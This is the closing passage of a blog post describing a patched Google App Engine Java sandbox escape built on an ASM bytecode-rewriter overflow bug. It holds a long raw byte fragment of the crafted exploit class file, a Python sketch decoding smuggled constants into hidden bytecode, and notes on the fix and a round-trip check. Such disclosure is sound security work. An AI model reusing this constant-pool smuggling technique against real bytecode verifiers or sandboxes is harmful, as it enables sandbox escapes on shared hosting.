j\x01\x00\x05s_26c\x08\x02l\x01\x00\x05s_26e\x08\x02n\x01\x00\x05s_270\x08\x02p\x01\x00\x05s_272\x08\x02r\x01\x00\x05s_274\x08\x02t\x01\x00\x05s_276\x08\x02v\x01\x00\x05s_278\x08\x02x\x01\x00\x05s_27a\x08\x02z\x01\x00\x05s_27c\x08\x02|\x01\x00\x05s_27e\x08\x02~\x01\x00\x05s_280\x08\x02\x80\x01\x00\x05s_282\x08\x02\x82\x01\x00\x05s_284\x08\x02\x84\x01\x00\x05s_286\x08\x02\x86\x01\x00\x05s_288\x08\x02\x88\x01\x00\x05s_28a\x08\x02\x8a\x01\x00\x05s_28c\x08\x02\x8c\x01\x00\x05s_28e\x08\x02\x8e\x01\x00\x05s_290\x08\x02\x90\x01\x00\x05s_292\x08\x02\x92\x01\x00\x05s_294\x08\x02\x94\x01\x00\x05s_296\x08\x02\x96\x01\x00\x05s_298\x08\x02\x98\x01\x00\x05s_29a\x08\x02\x9a\x01\x00\x05s_29c\x08\x02\x9c\x01\x00\x05s_29e\x08\x02\x9e\x01\x00\x05s_2a0\x08\x02\xa0\x01\x00\x05s_2a2\x08\x02\xa2\x01\x00\x05s_2a4\x08\x02\xa4\x01\x00\x05s_2a6\x08\x02\xa6\x01\x00\x05s_2a8\x08\x02\xa8\x01\x00\x05s_2aa\x08\x02\xaa\x01\x00\x05s_2ac\x08\x02\xac\x01\x00\x05s_2ae\x08\x02\xae\x01\x00\x05s_2b0\x08\x02\xb0\x01\x00\x05s_2b2\x08\x02\xb2\x01\x00\x05s_2b4\x08\x
02\xb4\x01\x00\x05s_2b6\x08\x02\xb6\x01\x00\x05s_2b8\x08\x02\xb8\x01\x00\x05s_2ba\x08\x02\xba\x01\x00\x05s_2bc\x08\x02\xbc\x01\x00\x05s_2be\x08\x02\xbe\x01\x00\x05s_2c0\x08\x02\xc0\x01\x00\x05s_2c2\x08\x02\xc2\x01\x00\x05s_2c4\x08\x02\xc4\x01\x00\x05s_2c6\x08\x02\xc6\x01\x00\x05s_2c8\x08\x02\xc8\x01\x00\x05s_2ca\x08\x02\xca\x01\x00\x05s_2cc\x08\x02\xcc\x01\x00\x05s_2ce\x08\x02\xce\x01\x00\x05s_2d0\x08\x02\xd0\x01\x00\x05s_2d2\x08\x02\xd2\x01\x00\x05s_2d4\x08\x02\xd4\x01\x00\x05s_2d6\x08\x02\xd6\x01\x00\x05s_2d8\x08\x02\xd8\x01\x00\x05s_2da\x08\x02\xda\x01\x00\x05s_2dc\x08\x02\xdc\x01\x00\x05s_2de\x08\x02\xde\x01\x00\x05s_2e0\x08\x02\xe0\x01\x00\x05s_2e2\x08\x02\xe2\x01\x00\x05s_2e4\x08\x02\xe4\x01\x00\x05s_2e6\x08\x02\xe6\x01\x00\x05s_2e8\x08\x02\xe8\x01\x00\x05s_2ea\x08\x02\xea\x01\x00\x05s_2ec\x08\x02\xec\x01\x00\x05s_2ee\x08\x02\xee\x01\x00\x05s_2f0\x08\x02\xf0\x01\x00\x05s_2f2\x08\x02\xf2\x01\x00\x05s_2f4\x08\x02\xf4\x01\x00\x05s_2f6\x08\x02\xf6\x01\x00\x05s_2f8\x08\x02\xf8\x01\x00\x05s_2fa\x08\x02\xfa\x01\x00\x05s_2fc\x08\x02\xfc\x01\x00\x05s_2fe\x08\x02\xfe\x01\x00\x05s_300\x08\x03\x00\x01\x00\x05s_302\x08\x03\x02\x00\x01\x00\x02\x00\x04\x00\x00\x00\x00\x00\x01\x00\x01\x00\x05\x00\x06\x00\x01\x00\t\x00\x00\x04\x0f\x07\xd0\x00\n\x00\x00\x04\x03\x12\x08\x12\n\x12\x0c\x12\x0e\x12\x10\x12\x12\x12\x14\x12\x16\x12\x18\x12\x1a\x12\x1c\x12\x1e\x12 
\x12"\x12$\x12&\x12(\x12*\x12,\x12.\x120\x122\x124\x126\x128\x12:\x12<\x12>\x12@\x12B\x12D\x12F\x12H\x12J\x12L\x12N\x12P\x12R\x12T\x12V\x12X\x12Z\x12\\\x12^\x12`\x12b\x12d\x12f\x12h\x12j\x12l\x12n\x12p\x12r\x12t\x12v\x12x\x12z\x12|\x12~\x12\x80\x12\x82\x12\x84\x12\x86\x12\x88\x12\x8a\x12\x8c\x12\x8e\x12\x90\x12\x92\x12\x94\x12\x96\x12\x98\x12\x9a\x12\x9c\x12\x9e\x12\xa0\x12\xa2\x12\xa4\x12\xa6\x12\xa8\x12\xaa\x12\xac\x12\xae\x12\xb0\x12\xb2\x12\xb4\x12\xb6\x12\xb8\x12\xba\x12\xbc\x12\xbe\x12\xc0\x12\xc2\x12\xc4\x12\xc6\x12\xc8\x12\xca\x12\xcc\x12\xce\x12\xd0\x12\xd2\x12\xd4\x12\xd6\x12\xd8\x12\xda\x12\xdc\x12\xde\x12\xe0\x12\xe2\x12\xe4\x12\xe6\x12\xe8\x12\xea\x12\xec\x12\xee\x12\xf0\x12\xf2\x12\xf4\x12\xf6\x12\xf8\x12\xfa\x12\xfc\x12\xfe\x13\x01\x00\x13\x01\x02\x13\x01\x04\x13\x01\x06\x13\x01\x08\x13\x01\n\x13\x01\x0c\x14\x01\r\x14\x01\x0f\x13\x01\x11\x14\x01\x12\x14\x01\x14\x14\x01\x16\x14\x01\x18\x14\x01\x1a\x14\x01\x1c\x14\x01\x1e\x14\x01 \x14\x01"\x14\x01$\x14\x01&\x14\x01(\x14\x01*\x14\x01,\x14\x01.\x14\x010\x14\x012\x13\x015\x13\x017\x13\x019\x13\x01;\x13\x01=\x13\x01?\x13\x01A\x13\x01C\x13\x01E\x13\x01G\x13\x01I\x13\x01K\x13\x01M\x13\x01O\x13\x01Q\x13\x01S\x13\x01U\x13\x01W\x13\x01Y\x13\x01[\x13\x01]\x13\x01_\x13\x01a\x13\x01c\x13\x01e\x13\x01g\x13\x01i\x13\x01k\x13\x01m\x13\x01o\x13\x01q\x13\x01s\x13\x01u\x13\x01w\x13\x01y\x13\x01{\x13\x01}\x13\x01\x7f\x13\x01\x81\x13\x01\x83\x13\x01\x85\x13\x01\x87\x13\x01\x89\x13\x01\x8b\x13\x01\x8d\x13\x01\x8f\x13\x01\x91\x13\x01\x93\x13\x01\x95\x13\x01\x97\x13\x01\x99\x13\x01\x9b\x13\x01\x9d\x13\x01\x9f\x13\x01\xa1\x13\x01\xa3\x13\x01\xa5\x13\x01\xa7\x13\x01\xa9\x13\x01\xab\x13\x01\xad\x13\x01\xaf\x13\x01\xb1\x13\x01\xb3\x13\x01\xb5\x13\x01\xb7\x13\x01\xb9\x13\x01\xbb\x13\x01\xbd\x13\x01\xbf\x13\x01\xc1\x13\x01\xc3\x13\x01\xc5\x13\x01\xc7\x13\x01\xc9\x13\x01\xcb\x13\x01\xcd\x13\x01\xcf\x13\x01\xd1\x13\x01\xd3\x13\x01\xd5\x13\x01\xd7\x13\x01\xd9\x13\x01\xdb\x13\x01\xdd\x13\x01\xdf\x13\x01\xe1\x13\x01\xe3\x13\x01\xe5\x13\
x01\xe7\x13\x01\xe9\x13\x01\xeb\x13\x01\xed\x13\x01\xef\x13\x01\xf1\x13\x01\xf3\x13\x01\xf5\x13\x01\xf7\x13\x01\xf9\x13\x01\xfb\x13\x01\xfd\x13\x01\xff\x13\x02\x01\x13\x02\x03\x13\x02\x05\x13\x02\x07\x13\x02\t\x13\x02\x0b\x13\x02\r\x13\x02\x0f\x13\x02\x11\x13\x02\x13\x13\x02\x15\x13\x02\x17\x13\x02\x19\x13\x02\x1b\x13\x02\x1d\x13\x02\x1f\x13\x02!\x13\x02#\x13\x02%\x13\x02\'\x13\x02)\x13\x02+\x13\x02-\x13\x02/\x13\x021\x13\x023\x13\x025\x13\x027\x13\x029\x13\x02;\x13\x02=\x13\x02?\x13\x02A\x13\x02C\x13\x02E\x13\x02G\x13\x02I\x13\x02K\x13\x02M\x13\x02O\x13\x02Q\x13\x02S\x13\x02U\x13\x02W\x13\x02Y\x13\x02[\x13\x02]\x13\x02_\x13\x02a\x13\x02c\x13\x02e\x13\x02g\x13\x02i\x13\x02k\x13\x02m\x13\x02o\x13\x02q\x13\x02s\x13\x02u\x13\x02w\x13\x02y\x13\x02{\x13\x02}\x13\x02\x7f\x13\x02\x81\x13\x02\x83\x13\x02\x85\x13\x02\x87\x13\x02\x89\x13\x02\x8b\x13\x02\x8d\x13\x02\x8f\x13\x02\x91\x13\x02\x93\x13\x02\x95\x13\x02\x97\x13\x02\x99\x13\x02\x9b\x13\x02\x9d\x13\x02\x9f\x13\x02\xa1\x13\x02\xa3\x13\x02\xa5\x13\x02\xa7\x13\x02\xa9\x13\x02\xab\x13\x02\xad\x13\x02\xaf\x13\x02\xb1\x13\x02\xb3\x13\x02\xb5\x13\x02\xb7\x13\x02\xb9\x13\x02\xbb\x13\x02\xbd\x13\x02\xbf\x13\x02\xc1\x13\x02\xc3\x13\x02\xc5\x13\x02\xc7\x13\x02\xc9\x13\x02\xcb\x13\x02\xcd\x13\x02\xcf\x13\x02\xd1\x13\x02\xd3\x13\x02\xd5\x13\x02\xd7\x13\x02\xd9\x13\x02\xdb\x13\x02\xdd\x13\x02\xdf\x13\x02\xe1\x13\x02\xe3\x13\x02\xe5\x13\x02\xe7\x13\x02\xe9\x13\x02\xeb\x13\x02\xed\x13\x02\xef\x13\x02\xf1\x13\x02\xf3\x13\x02\xf5\x13\x02\xf7\x13\x02\xf9\x13\x02\xfb\x13\x02\xfd\x13\x02\xff\x13\x03\x01\x13\x03\x03\x03\xac\x00\x00\x00\x00' 
.end method 
.end class 
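
The body of sneakyLoad in this output can be traced straight back to three of the ldc2_w constants in the input. The sketch below lays those constants out the way a constant pool stores them (a tag byte of 5 followed by eight big-endian bytes) and disassembles the result. It assumes the three constants end up adjacent in the pool, and the tiny opcode table only covers the instructions that appear here.

```python
import struct

# Three consecutive ldc2_w constants copied from the input listing.
LONGS = [0x00000000102A2B2C, 0x57032CBE2DB6010F, 0x57B0000000000000]

# Opcode -> (mnemonic, number of operand bytes), per the JVM instruction set.
OPCODES = {
    0x00: ("nop", 0),
    0x03: ("iconst_0", 0),
    0x05: ("iconst_2", 0),
    0x2A: ("aload_0", 0),
    0x2B: ("aload_1", 0),
    0x2C: ("aload_2", 0),
    0x2D: ("aload_3", 0),
    0x57: ("pop", 0),
    0xB0: ("areturn", 0),
    0xB6: ("invokevirtual", 2),
    0xBE: ("arraylength", 0),
}


def pool_bytes(longs):
    """Serialize values as CONSTANT_Long entries: tag 5 plus 8 bytes each."""
    return b"".join(b"\x05" + struct.pack(">Q", v) for v in longs)


def disassemble(code):
    """Return a list of (offset, mnemonic) pairs for the given bytecode."""
    out, pc = [], 0
    while pc < len(code):
        name, operand_size = OPCODES[code[pc]]
        out.append((pc, name))
        pc += 1 + operand_size
    return out


raw = pool_bytes(LONGS)
# Bytes 0-1 (the tag 05 and a 00) are read as max_locals = 0x0500 = 1280,
# bytes 2-5 as code_length, and the code itself starts at byte 6.
code_length = int.from_bytes(raw[2:6], "big")
code = raw[6:6 + code_length]

for offset, name in disassemble(code):
    print("L%d: %s" % (offset, name))
```

The iconst_2 and pop pairs in the output are the seams between constants: each tag byte 5 happens to be the opcode for iconst_2, and each following constant starts with 0x57 (pop) to discard the value again.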

Aftermath

Getting the exploit working took most of the week, so I didn’t have much time or inclination to try to extend the hack further beyond my foothold on the App Engine servers. I just gave a presentation about the exploit to interested people on the final day, collected my end-of-internship Google swag, etc.

To remediate this vulnerability, the App Engine team changed the system to run ASM again on its own output to check for discrepancies, thus preventing this entire class of exploits in the future. They also scanned all existing App Engine applications to see if anyone had tried to exploit it in the wild (luckily, nobody had). Finally, the overflow bug in ASM was quietly reported and patched upstream.
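
To make the round-trip idea concrete, here is a toy sketch. It is not App Engine's or ASM's actual code: the record format, the function names, and the deliberately buggy writer are all made up for illustration, and comparing the two parses is just one plausible reading of "check for discrepancies".

```python
import struct


def parse_records(blob: bytes) -> list:
    """Toy reader: a u2 big-endian length, then that many bytes.

    Like a lenient parser, it accepts both raw NUL bytes and the
    two-byte C0 80 form, decoding the latter back to NUL.
    """
    records, pos = [], 0
    while pos + 2 <= len(blob):
        (length,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        records.append(blob[pos:pos + length].replace(b"\xC0\x80", b"\x00"))
        pos += length
    return records


def write_records(records) -> bytes:
    """Toy writer with a deliberate bug: NUL expands to two bytes and the
    resulting length is silently truncated to 16 bits."""
    out = bytearray()
    for rec in records:
        encoded = rec.replace(b"\x00", b"\xC0\x80")
        out += struct.pack(">H", len(encoded) & 0xFFFF) + encoded
    return bytes(out)


def rewrite(blob: bytes) -> bytes:
    """Stand-in for running a file through the rewriter with no transforms."""
    return write_records(parse_records(blob))


def round_trips(blob: bytes) -> bool:
    """True if a second parse of the output sees what the first parse saw."""
    return parse_records(rewrite(blob)) == parse_records(blob)


benign = write_records([b"hello", b"a\x00b"])
# One record of 40000 raw NULs: fine on input, 80000 bytes once encoded.
evil = struct.pack(">H", 40000) + b"\x00" * 40000

print(round_trips(benign), round_trips(evil))
```

The benign input survives the round trip unchanged, while the oversized record comes back as several different records on the second parse, which is exactly the kind of mismatch such a check can reject.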

Anyway, this was a pretty long post (I’ve been working on it for the last six weeks) but I hope it was interesting and informative. If you have any questions, feel free to comment on Reddit or send me a PM.